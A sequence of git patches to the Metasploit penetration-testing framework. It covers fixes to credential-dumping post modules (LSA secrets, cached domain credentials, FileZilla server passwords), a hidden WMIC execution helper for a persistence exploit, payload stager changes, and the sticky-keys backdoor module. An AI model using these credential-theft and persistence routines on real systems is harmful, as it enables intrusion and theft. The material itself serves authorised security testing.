From bf6975c01aafae292ba9604fde6c08a05d35a816 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 27 Jul 2015 14:04:10 -0500
Subject: [PATCH 0880/1013] Fix #4558 by restoring the old wmicexec

---
 .../exploits/windows/local/vss_persistence.rb | 47 +++++++++++++++++++
 1 file changed, 47 insertions(+)

diff --git a/modules/exploits/windows/local/vss_persistence.rb b/modules/exploits/windows/local/vss_persistence.rb
index a869680f6a..86129b3c3d 100644
--- a/modules/exploits/windows/local/vss_persistence.rb
+++ b/modules/exploits/windows/local/vss_persistence.rb
@@ -194,4 +194,51 @@ class Metasploit3 < Msf::Exploit::Local
     print_status("Cleanup Meterpreter RC File: #{clean_rc}")
   end
 
+  #
+  # Execute a WMIC command
+  #
+  def wmic_query(wmic_cmd)
+    tmp_out = ''
+    old_timeout = session.response_timeout
+    session.response_timeout = 120
+    begin
+      tmp = expand_path('%TEMP%')
+      wmi_cfl = tmp + "\\" + sprintf('%.5d', rand(100000))
+      r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmi_cfl} #{wmic_cmd}", nil, {'Hidden' => true})
+      Rex.sleep(2)
+
+      # Making sure that wmic finishes before executing next wmic command
+      found = 0
+      while found == 0
+        session.sys.process.get_processes.each do |x|
+          found =1
+          if 'wmic.exe' == x['name'].downcase
+            Rex.sleep(0.5)
+            found = 0
+          end
+        end
+      end
+      r.close
+
+      # Give the process time to flush the output
+      Rex.sleep(2)
+
+      # Read the output file of the wmic commands
+      wmi_out_file = session.fs.file.new(wmi_cfl, 'rb')
+      until wmi_out_file.eof?
+        tmp_out << wmi_out_file.read
+      end
+      wmi_out_file.close
+    rescue ::Exception => e
+      print_error("Error running WMIC commands: #{e.class} #{e}")
+    end
+    # We delete the file with the wmic command output.
+    c = session.sys.process.execute("cmd.exe /c del #{wmi_cfl}", nil, {'Hidden' => true})
+    c.close
+    tmp_out.gsub!(/[^[:print:]]/,'') #scrub out garbage
+
+    session.response_timeout = old_timeout
+    tmp_out
+  end
+
 end

From 768de00214d52107866569b26993e0529a0937b2 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 27 Jul 2015 14:17:21 -0500
Subject: [PATCH 0881/1013] Automatically pass arch & platform from cmdstager

This allows the cmdstager mixin to automatically pass the arch
and platform information without changing the modules. This should
address the following tickets:

Fix #5727
Fix #5718
Fix #5761
---
 lib/msf/core/exploit/cmdstager.rb                 | 5 ++++-
 modules/exploits/linux/http/fritzbox_echo_exec.rb | 4 +---
 2 files changed, 5 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb
index 3f9a656ea7..858c305949 100644
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -112,7 +112,10 @@ module Exploit::CmdStager
   def generate_cmdstager(opts = {}, pl = nil)
     select_cmdstager(opts)
 
-    exe_opts = {code: pl}.merge(opts)
+    exe_opts = {code: pl}.merge(
+        platform: target_platform,
+        arch: target_arch
+      )
     self.exe = generate_payload_exe(exe_opts)
 
     if exe.nil?
diff --git a/modules/exploits/linux/http/fritzbox_echo_exec.rb b/modules/exploits/linux/http/fritzbox_echo_exec.rb
index 1d7fffe69d..acb764be06 100644
--- a/modules/exploits/linux/http/fritzbox_echo_exec.rb
+++ b/modules/exploits/linux/http/fritzbox_echo_exec.rb
@@ -110,9 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("#{peer} - Exploiting...")
     execute_cmdstager(
       flavor: :echo,
-      linemax: 92,
-      platform: target.platform,
-      arch: target.arch
+      linemax: 92
     )
   end
 end

From 704c8cadd98d1a9906044b3cb4eeb0e3569b1dd5 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 27 Jul 2015 16:19:01 -0500
Subject: [PATCH 0882/1013] Fix lsa_secrets

---
 modules/post/windows/gather/lsa_secrets.rb | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/modules/post/windows/gather/lsa_secrets.rb b/modules/post/windows/gather/lsa_secrets.rb
index 756e7c0f95..812691a029 100644
--- a/modules/post/windows/gather/lsa_secrets.rb
+++ b/modules/post/windows/gather/lsa_secrets.rb
@@ -59,7 +59,12 @@ class Metasploit3 < Msf::Post
           decrypted = decrypt_lsa_data(encrypted_secret, lsa_key)
         else
           # and here
-          encrypted_secret = encrypted_secret[0xC..-1]
+          if sysinfo['Architecture'] =~ /wow64/i || sysinfo['Architecture'] =~ /x64/
+            encrypted_secret = encrypted_secret[0x10..-1]
+          else # 32 bits
+            encrypted_secret = encrypted_secret[0xC..-1]
+          end
+
           decrypted = decrypt_secret_data(encrypted_secret, lsa_key)
         end
 

From ab7ffb1a08b892e5ad948236148e3f408d29b1eb Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 27 Jul 2015 17:26:53 -0500
Subject: [PATCH 0883/1013] Fich cachedump

---
 modules/post/windows/gather/cachedump.rb | 14 ++++++++++++--
 1 file changed, 12 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb
index 09fb149da8..cec73a7b07 100644
--- a/modules/post/windows/gather/cachedump.rb
+++ b/modules/post/windows/gather/cachedump.rb
@@ -44,7 +44,11 @@ class Metasploit3 < Msf::Post
     if lsa_vista_style?
       nlkm_dec = decrypt_lsa_data(nlkm, lsakey)
     else
-      nlkm_dec = decrypt_secret_data(nlkm[0xC..-1], lsakey)
+      if sysinfo['Architecture'] =~ /wow64/i || sysinfo['Architecture'] =~ /x64/
+        nlkm_dec = decrypt_secret_data(nlkm[0x10..-1], lsakey)
+      else # 32 bits
+        nlkm_dec = decrypt_secret_data(nlkm[0xC..-1], lsakey)
+      end
     end
 
     return nlkm_dec
@@ -291,7 +295,13 @@ class Metasploit3 < Msf::Post
     begin
       print_status("Executing module against #{sysinfo['Computer']}")
       client.railgun.netapi32()
-      if client.railgun.netapi32.NetGetJoinInformation(nil,4,4)["BufferType"] != 3
+      join_status = client.railgun.netapi32.NetGetJoinInformation(nil,4,4)["BufferType"]
+
+      if sysinfo['Architecture'] =~ /wow64/i || sysinfo['Architecture'] =~ /x64/
+        join_status = join_status & 0x0000ffff
+      end
+
+      if join_status != 3
         print_error("System is not joined to a domain, exiting..")
         return
       end

From e53419a911861b59a08f8871eb624e5530c4600f Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Mon, 27 Jul 2015 19:21:59 -0500
Subject: [PATCH 0884/1013] use password_prompt? not @password_prompt

---
 lib/metasploit/framework/login_scanner/telnet.rb    | 2 +-
 modules/auxiliary/scanner/rservices/rlogin_login.rb | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/metasploit/framework/login_scanner/telnet.rb b/lib/metasploit/framework/login_scanner/telnet.rb
index 29ed0f4b97..812e631458 100644
--- a/lib/metasploit/framework/login_scanner/telnet.rb
+++ b/lib/metasploit/framework/login_scanner/telnet.rb
@@ -85,7 +85,7 @@ module Metasploit
               recvd_sample = @recvd.dup
               # Allow for slow echos
               1.upto(10) do
-                recv_telnet(self.sock, 0.10) unless @recvd.nil? or @recvd[/#{@password_prompt}/]
+                recv_telnet(self.sock, 0.10) unless @recvd.nil? || password_prompt?(@recvd)
               end
 
               if password_prompt?(credential.public)
diff --git a/modules/auxiliary/scanner/rservices/rlogin_login.rb b/modules/auxiliary/scanner/rservices/rlogin_login.rb
index c5e44f0e09..7d1414a6d6 100644
--- a/modules/auxiliary/scanner/rservices/rlogin_login.rb
+++ b/modules/auxiliary/scanner/rservices/rlogin_login.rb
@@ -256,7 +256,7 @@ class Metasploit3 < Msf::Auxiliary
 
     # Allow for slow echos
     1.upto(10) do
-      recv(self.sock, 0.10) unless @recvd.nil? or @recvd[/#{@password_prompt}/]
+      recv(self.sock, 0.10) unless @recvd.nil? || password_prompt?(@recvd)
     end
 
     vprint_status("#{rhost}:#{rport} Prompt: #{@recvd.gsub(/[\r\n\e\b\a]/, ' ')}")

From 7681d73e01587bacc5d919a2db439604317b2b9a Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Tue, 28 Jul 2015 04:11:17 -0700
Subject: [PATCH 0885/1013] Relocate Webarchive into the Exploit namespace,
 fixes #5717

---
 lib/msf/core/{ => exploit}/format/webarchive.rb        | 2 ++
 modules/auxiliary/gather/safari_file_url_navigation.rb | 4 ++--
 2 files changed, 4 insertions(+), 2 deletions(-)
 rename lib/msf/core/{ => exploit}/format/webarchive.rb (99%)

diff --git a/lib/msf/core/format/webarchive.rb b/lib/msf/core/exploit/format/webarchive.rb
similarity index 99%
rename from lib/msf/core/format/webarchive.rb
rename to lib/msf/core/exploit/format/webarchive.rb
index 7a8c3e79c9..876be35c17 100644
--- a/lib/msf/core/format/webarchive.rb
+++ b/lib/msf/core/exploit/format/webarchive.rb
@@ -4,6 +4,7 @@
 # installing extensions from extensions.apple.com.
 #
 module Msf
+module Exploit
 module Format
 module Webarchive
 
@@ -363,3 +364,4 @@ function reportStolenCookies() {
 end
 end
 end
+end
diff --git a/modules/auxiliary/gather/safari_file_url_navigation.rb b/modules/auxiliary/gather/safari_file_url_navigation.rb
index c4509baf81..bd2c72c701 100644
--- a/modules/auxiliary/gather/safari_file_url_navigation.rb
+++ b/modules/auxiliary/gather/safari_file_url_navigation.rb
@@ -4,12 +4,12 @@
 ###
 
 require 'msf/core'
-require 'msf/core/format/webarchive'
+require 'msf/core/exploit/format/webarchive'
 
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Exploit::Remote::FtpServer
-  include Msf::Format::Webarchive
+  include Msf::Exploit::Format::Webarchive
   include Msf::Auxiliary::Report
 
   def initialize(info = {})

From bf96b341084ed7580772d2e4d29ee71964dea503 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Tue, 28 Jul 2015 04:13:35 -0700
Subject: [PATCH 0886/1013] Tweak module->class

---
 Gemfile.lock                              | 3 +++
 lib/msf/core/exploit/format/webarchive.rb | 2 +-
 2 files changed, 4 insertions(+), 1 deletion(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index b93b5fb156..d3a85ece19 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -247,3 +247,6 @@ DEPENDENCIES
   simplecov
   timecop
   yard
+
+BUNDLED WITH
+   1.10.3
diff --git a/lib/msf/core/exploit/format/webarchive.rb b/lib/msf/core/exploit/format/webarchive.rb
index 876be35c17..52dbb387fc 100644
--- a/lib/msf/core/exploit/format/webarchive.rb
+++ b/lib/msf/core/exploit/format/webarchive.rb
@@ -4,7 +4,7 @@
 # installing extensions from extensions.apple.com.
 #
 module Msf
-module Exploit
+class Exploit
 module Format
 module Webarchive
 

From 0220e840af75f7b019b47b587ce5d3dcfe7b52ca Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Tue, 28 Jul 2015 04:34:59 -0700
Subject: [PATCH 0887/1013] Remove stray Gemfile.lock difference

---
 Gemfile.lock | 3 ---
 1 file changed, 3 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index d3a85ece19..b93b5fb156 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -247,6 +247,3 @@ DEPENDENCIES
   simplecov
   timecop
   yard
-
-BUNDLED WITH
-   1.10.3

From ee5e5b1e719e8572047fc2da458639d225f05faf Mon Sep 17 00:00:00 2001
From: kn0 <Trenton.Ivey@gmail.com>
Date: Tue, 28 Jul 2015 09:03:54 -0500
Subject: [PATCH 0888/1013] Fixed NoMethodError for .match on nil

---
 modules/auxiliary/scanner/http/ntlm_info_enumeration.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb
index dbdabaabbc..a844420793 100644
--- a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb
+++ b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb
@@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary
     return if res.nil?
 
     vprint_status("Status: #{res.code}")
-    if res and res.code == 401 and res['WWW-Authenticate'].match(/^NTLM/i)
+    if res and res.code == 401 and res['WWW-Authenticate'] and res['WWW-Authenticate'].match(/^NTLM/i)
       hash = res['WWW-Authenticate'].split('NTLM ')[1]
       # Parse out the NTLM and just get the Target Information Data
       target = Rex::Proto::NTLM::Message.parse(Rex::Text.decode_base64(hash))[:target_info].value()

From 2415072c17e89edc77f19002a470f1dfe3e7d1cd Mon Sep 17 00:00:00 2001
From: kn0 <Trenton.Ivey@gmail.com>
Date: Tue, 28 Jul 2015 14:14:25 -0500
Subject: [PATCH 0889/1013] Replaced 'and' with '&&'

---
 modules/auxiliary/scanner/http/ntlm_info_enumeration.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb
index a844420793..49e1d33495 100644
--- a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb
+++ b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
       # can't simply return here as we'll print an error for each host
       fail_with "Either TARGET_URI or TARGET_URIS_FILE must be specified"
     end
-    if (turi and !turi.blank?)
+    if (turi && !turi.blank?)
       test_uris << normalize_uri(turi)
     end
     if (turis_file && !turis_file.blank?)
@@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary
     return if res.nil?
 
     vprint_status("Status: #{res.code}")
-    if res and res.code == 401 and res['WWW-Authenticate'] and res['WWW-Authenticate'].match(/^NTLM/i)
+    if res && res.code == 401 && res['WWW-Authenticate'] && res['WWW-Authenticate'].match(/^NTLM/i)
       hash = res['WWW-Authenticate'].split('NTLM ')[1]
       # Parse out the NTLM and just get the Target Information Data
       target = Rex::Proto::NTLM::Message.parse(Rex::Text.decode_base64(hash))[:target_info].value()

From 38e952ba07036ba84a3e11c11ea01a0e077306a2 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Wed, 29 Jul 2015 10:55:28 +0100
Subject: [PATCH 0890/1013] Python -> Ruby

---
 .../gather/credentials/filezilla_server.rb    | 123 ++++++++++--------
 1 file changed, 66 insertions(+), 57 deletions(-)

diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb
index 19147e2349..4fd3ca037e 100644
--- a/modules/post/windows/gather/credentials/filezilla_server.rb
+++ b/modules/post/windows/gather/credentials/filezilla_server.rb
@@ -11,20 +11,23 @@ class Metasploit3 < Msf::Post
 
   include Msf::Post::File
 
-  def initialize(info={})
+  def initialize(info = {})
     super( update_info(info,
       'Name'           => 'Windows Gather FileZilla FTP Server Credential Collection',
       'Description'    => %q{ This module will collect credentials from the FileZilla FTP server if installed. },
       'License'        => MSF_LICENSE,
-      'Author'         => ['bannedit'],
+      'Author'         =>
+        [
+          'bannedit',  # original idea & module
+          'g0tmi1k'    # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
+        ],
       'Platform'       => ['win'],
       'SessionTypes'   => ['meterpreter' ]
     ))
 
-    register_options(
-      [
-        OptBool.new('SSLCERT', [false, 'Loot the SSL Certificate if its there?', false]), # useful perhaps for MITM
-      ], self.class)
+    register_options([
+      OptBool.new('SSLCERT', [false, 'Loot the SSL Certificate if its there?', false]), # useful perhaps for MITM
+    ], self.class)
   end
 
 
@@ -37,7 +40,7 @@ class Metasploit3 < Msf::Post
     @progs = "#{session.sys.config.getenv('ProgramFiles')}\\"
 
     filezilla = check_filezilla
-    get_filezilla_creds(filezilla) if filezilla != nil
+    get_filezilla_creds(filezilla) if filezilla
   end
 
 
@@ -55,18 +58,18 @@ class Metasploit3 < Msf::Post
     end
 
     session.fs.dir.foreach(path) do |fdir|
-      ['FileZilla Server.xml','FileZilla Server Interface.xml'].each do|xmlfile|
-        if fdir.eql? xmlfile
-          pathtmp = File.join(path + xmlfile)
-          vprint_status("Configuration File Found: %s" % pathtmp)
-          paths << pathtmp
+      ['FileZilla Server.xml','FileZilla Server Interface.xml'].each do |xmlfile|
+        if fdir == xmlfile
+          filepath = path + xmlfile
+          vprint_status("Configuration file found: #{filepath}")
+          paths << filepath
         end
       end
     end
 
     if !paths.empty?
       print_good("Found FileZilla Server on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
-      print_line("")
+      print_line
       return paths
     end
 
@@ -110,9 +113,9 @@ class Metasploit3 < Msf::Post
     ])
 
     configuration = Rex::Ui::Text::Table.new(
-    'Header'    => "FileZilla FTP Server Configuration",
-    'Indent'    => 1,
-    'Columns'   =>
+    'Header'      => "FileZilla FTP Server Configuration",
+    'Indent'      => 1,
+    'Columns'     =>
     [
       "FTP Port",
       "FTP Bind IP",
@@ -125,9 +128,9 @@ class Metasploit3 < Msf::Post
     ])
 
     lastserver = Rex::Ui::Text::Table.new(
-    'Header'    => "FileZilla FTP Last Server",
-    'Indent'    => 1,
-    'Columns'   =>
+    'Header'   => "FileZilla FTP Last Server",
+    'Indent'   => 1,
+    'Columns'  =>
     [
       "IP",
       "Port",
@@ -135,7 +138,7 @@ class Metasploit3 < Msf::Post
     ])
 
 
-    paths.each do|path|
+    paths.each do |path|
       file = session.fs.file.new(path, "rb")
       until file.eof?
         if path.include? "FileZilla Server.xml"
@@ -190,8 +193,9 @@ class Metasploit3 < Msf::Post
     end
 
     perms.each do |perm|
-      permissions << [perm['host'], perm['user'], perm['dir'], perm['fileread'], perm['filewrite'], perm['filedelete'], perm['fileappend'],
-        perm['dircreate'], perm['dirdelete'], perm['dirlist'], perm['dirsubdirs'], perm['autocreate'], perm['home']]
+      permissions << [perm['host'], perm['user'], perm['dir'], perm['fileread'], perm['filewrite'],
+        perm['filedelete'], perm['fileappend'], perm['dircreate'], perm['dirdelete'], perm['dirlist'],
+        perm['dirsubdirs'], perm['autocreate'], perm['home']]
     end
 
     session.db_record ? (source_id = session.db_record.id) : (source_id = nil)
@@ -234,26 +238,26 @@ class Metasploit3 < Msf::Post
       login = create_credential_login(login_data)
     end
 
-    vprint_status("       FTP Port: %s" % config['ftp_port'])
-    vprint_status("    FTP Bind IP: %s" % config['ftp_bindip'])
-    vprint_status("            SSL: %s" % config['ssl'])
-    vprint_status("     Admin Port: %s" % config['admin_port'])
-    vprint_status("  Admin Bind IP: %s" % config['admin_bindip'])
-    vprint_status("     Admin Pass: %s" % config['admin_pass'])
-    vprint_line("")
+    vprint_status("       FTP Port: #{config['ftp_port']}")
+    vprint_status("    FTP Bind IP: #{config['ftp_bindip']}")
+    vprint_status("            SSL: #{config['ssl']}")
+    vprint_status("     Admin Port: #{config['admin_port']}")
+    vprint_status("  Admin Bind IP: #{config['admin_bindip']}")
+    vprint_status("     Admin Pass: #{config['admin_pass']}")
+    vprint_line
 
-    configuration << [config['ftp_port'], config['ftp_bindip'], config['admin_port'], config['admin_bindip'], config['admin_pass'],
-      config['ssl'], config['ssl_certfile'], config['ssl_keypass']]
+    configuration << [config['ftp_port'], config['ftp_bindip'], config['admin_port'], config['admin_bindip'],
+      config['admin_pass'], config['ssl'], config['ssl_certfile'], config['ssl_keypass']]
 
 
     lastser = parse_interface(fsi_xml)
     lastserver << [lastser['ip'], lastser['port'], lastser['password']]
 
     vprint_status("Last Server Information:")
-    vprint_status("         IP: %s" % lastser['ip'])
-    vprint_status("       Port: %s" % lastser['port'])
-    vprint_status("   Password: %s" % lastser['password'])
-    vprint_line("")
+    vprint_status("         IP: #{lastser['ip']}")
+    vprint_status("       Port: #{lastser['port']}")
+    vprint_status("   Password: #{lastser['password']}")
+    vprint_line
 
     p = store_loot("filezilla.server.creds", "text/csv", session, credentials.to_csv,
       "filezilla_server_credentials.csv", "FileZilla FTP Server Credentials")
@@ -271,7 +275,7 @@ class Metasploit3 < Msf::Post
       "filezilla_server_lastserver.csv", "FileZilla FTP Last Server")
     print_status(" Last server history: #{p.to_s}")
 
-    print_line("")
+    print_line
   end
 
 
@@ -303,11 +307,19 @@ class Metasploit3 < Msf::Post
     settings['ssl']        = opt[42].text rescue ""
 
     # empty means localhost only * is 0.0.0.0
-    settings['local_host'] ? (settings['admin_bindip'] = settings['local_host']) : (settings['admin_bindip'] = "127.0.0.1")
-    settings['admin_bindip'] = "0.0.0.0" if settings['admin_bindip'] == "*" or settings['admin_bindip'].empty?
+    if settings['local_host']
+      settings['admin_bindip'] = settings['local_host']
+    else
+      settings['admin_bindip'] = "127.0.0.1"
+    end
+    settings['admin_bindip'] = "0.0.0.0" if settings['admin_bindip'] == "*" || settings['admin_bindip'].empty?
 
-    settings['bindip'] ? (settings['ftp_bindip'] = settings['bindip']) : (settings['ftp_bindip'] = "127.0.0.1")
-    settings['ftp_bindip'] = "0.0.0.0" if settings['ftp_bindip'] == "*" or settings['ftp_bindip'].empty?
+    if settings['bindip']
+      settings['ftp_bindip'] = settings['bindip']
+    else
+      settings['ftp_bindip'] = "127.0.0.1"
+    end
+    settings['ftp_bindip'] = "0.0.0.0" if settings['ftp_bindip'] == "*" || settings['ftp_bindip'].empty?
 
     if settings['ssl'] == "1"
       settings['ssl'] = "true"
@@ -319,7 +331,7 @@ class Metasploit3 < Msf::Post
     end
 
     settings['ssl_certfile'] = items[45].text rescue "<none>"
-    if settings['ssl_certfile'] != "<none>" and settings['ssl'] == "true" and datastore['SSLCERT']   # lets get the file if its there could be useful in MITM attacks
+    if settings['ssl_certfile'] != "<none>" and settings['ssl'] == "true" and datastore['SSLCERT'] # lets get the file if its there could be useful in MITM attacks
       sslfile = session.fs.file.new(settings['ssl_certfile'])
       until sslfile.eof?
         sslcert << sslfile.read
@@ -334,7 +346,7 @@ class Metasploit3 < Msf::Post
     settings['ssl_keypass'] = items[50].text rescue "<none>"
     settings['ssl_keypass'] = "<none>" if settings['ssl_keypass'].nil?
 
-    vprint_status("Collected the following credentials:") if !doc.elements['Users'].nil?
+    vprint_status("Collected the following credentials:") if doc.elements['Users']
 
     doc.elements.each("Users/User") do |user|
       account = {}
@@ -377,20 +389,20 @@ class Metasploit3 < Msf::Post
       account['ssl']  = settings['ssl']
       creds << account
 
-      vprint_status("    Username: %s" % account['user'])
-      vprint_status("    Password: %s" % account['password'])
-      vprint_status("       Group: %s" % account['group']) if account['group'] != nil
-      vprint_line("")
+      vprint_status("    Username: #{account['user']}")
+      vprint_status("    Password: #{account['password']}")
+      vprint_status("       Group: #{account['group']}") if account['group']
+      vprint_line
     end
 
     # Rather than printing out all the values, just count up
     groups = groups.uniq unless groups.uniq.nil?
     if !datastore['VERBOSE']
       print_status("Collected the following credentials:")
-      print_status("    Usernames: %u" % users)
-      print_status("    Passwords: %u" % passwords)
-      print_status("       Groups: %u" % groups.length)
-      print_line("")
+      print_status("    Usernames: #{users}")
+      print_status("    Passwords: #{passwords}")
+      print_status("       Groups: #{groups.length}")
+      print_line
     end
     return [creds, perms, settings]
   end
@@ -411,21 +423,18 @@ class Metasploit3 < Msf::Post
     lastser['port']     = opt[1].text rescue "<none>"
     lastser['password'] = opt[2].text rescue "<none>"
 
-    lastser['password'] = "<none>" if lastser['password'] == nil
+    lastser['password'] = "<none>" if lastser['password'].nil?
 
-    return lastser
+    lastser
   end
 
 
   def got_root?
-    if session.sys.config.getuid =~ /SYSTEM/
-      return true
-    end
-    return false
+    session.sys.config.getuid =~ /SYSTEM/ ? true : false
   end
 
 
   def whoami
-    return session.sys.config.getenv('USERNAME')
+    session.sys.config.getenv('USERNAME')
   end
 end

From e966545e088bb73ae25e8eddd12cfffb23def9b4 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 29 Jul 2015 09:13:37 -0500
Subject: [PATCH 0891/1013] Fix mask

---
 modules/post/windows/gather/cachedump.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb
index cec73a7b07..f5eebd432c 100644
--- a/modules/post/windows/gather/cachedump.rb
+++ b/modules/post/windows/gather/cachedump.rb
@@ -297,8 +297,8 @@ class Metasploit3 < Msf::Post
       client.railgun.netapi32()
       join_status = client.railgun.netapi32.NetGetJoinInformation(nil,4,4)["BufferType"]
 
-      if sysinfo['Architecture'] =~ /wow64/i || sysinfo['Architecture'] =~ /x64/
-        join_status = join_status & 0x0000ffff
+      if sysinfo['Architecture'] =~ /x64/
+        join_status = join_status & 0x00000000ffffffff
       end
 
       if join_status != 3

From 5ff46a5dbdbc31f9fd5450d7e820c0cf3496fedc Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Wed, 29 Jul 2015 11:45:49 -0500
Subject: [PATCH 0892/1013] Fix indentation

---
 lib/msf/core/exploit/cmdstager.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb
index 858c305949..709c797925 100644
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -113,9 +113,9 @@ module Exploit::CmdStager
     select_cmdstager(opts)
 
     exe_opts = {code: pl}.merge(
-        platform: target_platform,
-        arch: target_arch
-      )
+      platform: target_platform,
+      arch: target_arch
+    )
     self.exe = generate_payload_exe(exe_opts)
 
     if exe.nil?

From ee66cadde2b5ddb93b75bcea6662237014103180 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Wed, 29 Jul 2015 12:29:09 -0500
Subject: [PATCH 0893/1013] Don't use bullet points in descriptions

They never render correctly in anything other than a text editor.

modules/post/windows/manage/sticky_keys.rb first landed in #5760,
Sticky Keys post module
---
 modules/post/windows/manage/sticky_keys.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/post/windows/manage/sticky_keys.rb b/modules/post/windows/manage/sticky_keys.rb
index bee682be4b..39fd81c1a8 100644
--- a/modules/post/windows/manage/sticky_keys.rb
+++ b/modules/post/windows/manage/sticky_keys.rb
@@ -25,10 +25,10 @@ class Metasploit4 < Msf::Post
 
         The module options allow for this hack to be applied to:
 
-        - SETHC   - sethc.exe is invoked when SHIFT is pressed 5 times.
-        - UTILMAN - Utilman.exe is invoked by pressing WINDOWS+U.
-        - OSK     - osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard.
-        - DISP    - DisplaySwitch.exe is invoked by pressing WINDOWS+P.
+        SETHC   (sethc.exe is invoked when SHIFT is pressed 5 times),
+        UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),
+        OSK     (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard), and
+        DISP    (DisplaySwitch.exe is invoked by pressing WINDOWS+P).
 
         The hack can be added using the ADD action, and removed with the REMOVE action.
 

From 8043e5a88e66c9ab60a8385ec5d58b9140489f4f Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Wed, 29 Jul 2015 12:31:43 -0500
Subject: [PATCH 0894/1013] Add a reference to the sticky keys exploit

---
 modules/post/windows/manage/sticky_keys.rb | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/modules/post/windows/manage/sticky_keys.rb b/modules/post/windows/manage/sticky_keys.rb
index 39fd81c1a8..d14faa2ec7 100644
--- a/modules/post/windows/manage/sticky_keys.rb
+++ b/modules/post/windows/manage/sticky_keys.rb
@@ -43,6 +43,9 @@ class Metasploit4 < Msf::Post
         ['ADD',    {'Description' => 'Add the backdoor to the target.'}],
         ['REMOVE', {'Description' => 'Remove the backdoor from the target.'}]
       ],
+      'References' => [
+        ['URL', 'https://social.technet.microsoft.com/Forums/windows/en-US/a3968ec9-5824-4bc2-82a2-a37ea88c273a/sticky-keys-exploit'],
+      ],
       'DefaultAction' => 'ADD'
     ))
 

From a342a9db10e3b67085235abe73a305b31edc63cc Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Wed, 29 Jul 2015 12:32:38 -0500
Subject: [PATCH 0895/1013] Another sticky keys ref, from @carnal0wnage

---
 modules/post/windows/manage/sticky_keys.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/post/windows/manage/sticky_keys.rb b/modules/post/windows/manage/sticky_keys.rb
index d14faa2ec7..ce5bdbc771 100644
--- a/modules/post/windows/manage/sticky_keys.rb
+++ b/modules/post/windows/manage/sticky_keys.rb
@@ -45,6 +45,7 @@ class Metasploit4 < Msf::Post
       ],
       'References' => [
         ['URL', 'https://social.technet.microsoft.com/Forums/windows/en-US/a3968ec9-5824-4bc2-82a2-a37ea88c273a/sticky-keys-exploit'],
+        ['URL', 'http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html']
       ],
       'DefaultAction' => 'ADD'
     ))

From c725f74d46d1da22eb7c10c847bc426ffe6bfaca Mon Sep 17 00:00:00 2001
From: Mo Sadek <msadek@rapid7.com>
Date: Wed, 29 Jul 2015 13:19:51 -0500
Subject: [PATCH 0896/1013] Add Local Exploit Suggestor

Resolve #5647
---
 .../multi/recon/local_exploit_suggestor.rb    | 127 ++++++++++++++++++
 1 file changed, 127 insertions(+)
 create mode 100644 modules/post/multi/recon/local_exploit_suggestor.rb

